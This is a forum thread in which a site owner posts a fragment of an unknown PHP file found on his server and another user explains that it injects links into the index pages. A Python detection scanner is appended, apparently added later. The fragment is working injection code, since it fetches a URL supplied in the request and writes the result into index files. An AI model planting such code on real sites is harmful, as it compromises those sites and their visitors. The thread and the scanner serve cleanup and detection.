Suspicious php




Posted by wildbrook, 03-24-2010, 06:18 AM
I found the following script on my server (in my cgi folder), in a file called "xrdam.php". Now, I'm fairly sure I didn't put it there, although I have been installing a few bits and pieces recently, so I can't be sure. Because I'm not familiar with php syntax, I have no way of knowing what it does. Can someone help me with this? I have found odd files like this before, and am wondering if someone is hacking.

    ",$read)){
            $fp = fopen($t."index".$r,"w");
            if(fwrite($fp,$read."\n")) print "Setuped...";
            fclose($fp);
        } else print "Already....";
    }
    if($_GET['f']){
        $f = file_get_contents($_GET['f']);
        $read = html_entity_decode(implode('',file($t."index".$r)));
        if(ereg("",$read)){
            $ex = explode("",$read);
            if($r == ".php"&&ereg("Joomla",$ex[0])&&!ereg("?>",$ex[0])){
                $op = "?>\n";
            }else{
                $op = '';
            }
            $fw = $ex[0].$op."".$f;
            $fp = fopen($t."index".$r,"w");
            if(fwrite($fp,$fw)) print "

    {OK!}

    ";
            fclose($fp);
        }
    }
    ?>

Posted by Crashus, 03-24-2010, 06:41 AM
It is adding hidden links (maybe even to malware) into your index files (html and php)

Posted by wildbrook, 03-24-2010, 07:37 AM
Thank you! Does it say anything about the type/destination/source of the links? Will I be able to see them in the programming?

Posted by Crashus, 03-24-2010, 07:58 AM
Most likely you will see them in the source code of the html page itself, or you will be redirected to them when you load the page. Unfortunately, I cannot give you an exact answer on this.

Posted by wildbrook, 03-24-2010, 08:15 AM
Thank you very much! I have no idea how they're getting in, though. FTP access is locked to my IP...

Posted by Crashus, 03-24-2010, 08:33 AM
Scan your PC for viruses. Is this shared hosting or a dedicated server?

Posted by wildbrook, 03-24-2010, 11:01 AM
I'm on Mac, and (as far as I can be sure) have no viruses. The server is remote, and is part of a reseller's account (mine). I assume it's a shared server - I've not paid for anything but the basic reseller's package. That being said, there is no access to other sites through ftp like I've seen on some other virtual servers.

Posted by Crashus, 03-24-2010, 11:30 AM
Mac has no viruses which can act in that way. Do you have secure permissions for your hosted files and folders? If you're absolutely sure about your security, then it may be your hoster's.

Posted by wildbrook, 03-24-2010, 12:54 PM
The permissions are set to 755 for that certain folder (it's a cgi folder). I'm as sure as I can be about security, but in truth I have little knowledge of what these people can do, and/or how to stop them. I'm content that no one's getting in through my computer (i.e. stealing passwords), I have a strong password, and, as I said in an earlier reply, my ftp access is locked to my IP address, so I'm stumped.

Posted by Crashus, 03-24-2010, 12:56 PM
Then most likely your security is okay. Ask your support to provide some logs, like who was using your ftp access and when, and who was changing/uploading this file.

Posted by wildbrook, 03-24-2010, 04:52 PM
Thanks, Crashus: I found a link in an auto-redirecting index file - not one that is ever updated or overwritten, so I'm really grateful to you for knowing to look, and where to look, for the coding. I've written to my service provider, to mention the issue and ask about logs. I'm waiting to hear what they say. Thanks again.

Posted by Crashus, 03-24-2010, 04:57 PM
You're welcome, feel free to PM me in case of any questions
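
Added example, not part of the original thread: a Python scanner that walks a web root and flags PHP files combining the traits visible in the posted fragment (a request parameter fed to file_get_contents, an "index" file opened for writing, an fwrite call), and reports each file's modification time for comparison with the host's FTP and web logs. The trait names, the `cgi-bin` folder name and the sample file contents are constructed assumptions.

```python
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Heuristic traits taken from the fragment posted in this thread; not a signature.
# The fopen pattern targets the concatenated form seen there: $t."index".$r,"w"
TRAITS = {
    "request_to_file_read": re.compile(r"file_get_contents\s*\(\s*\$_(GET|POST|REQUEST)\b"),
    "index_opened_for_write": re.compile(
        r"fopen\s*\([^;]*[\"']index[\"'][^;]*[\"'][wa]\+?b?[\"']\s*\)"),
    "fwrite_call": re.compile(r"\bfwrite\s*\("),
}
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".inc"}


def scan(root, min_hits=2):
    """Return (relative path, matched traits, mtime in UTC) for suspicious PHP files."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in PHP_SUFFIXES:
            continue
        text = path.read_text(errors="replace")
        hits = sorted(name for name, rx in TRAITS.items() if rx.search(text))
        if len(hits) >= min_hits:
            mtime = datetime.fromtimestamp(path.stat().st_mtime, timezone.utc)
            findings.append((str(path.relative_to(root)), hits, mtime.isoformat()))
    return findings


def build_sample_tree(root):
    """Constructed sample input: a benign page and a file with lines from the thread."""
    root = Path(root)
    (root / "cgi-bin").mkdir()  # folder name is an assumption
    (root / "index.php").write_text("<?php echo 'Welcome'; ?>\n")
    (root / "cgi-bin" / "xrdam.php").write_text(
        "<?php\n"
        "if($_GET['f']){ $f = file_get_contents($_GET['f']);\n"
        "$fp = fopen($t.\"index\".$r,\"w\"); if(fwrite($fp,$fw)) print \"ok\"; }\n"
    )
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, hits, mtime in scan(build_sample_tree(tmp)):
            print(f"{rel}  modified {mtime}  traits: {', '.join(hits)}")
```

A hit is a lead for manual review, not proof of compromise; the modification time it prints is the value to match against the upload and access logs requested from the host.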


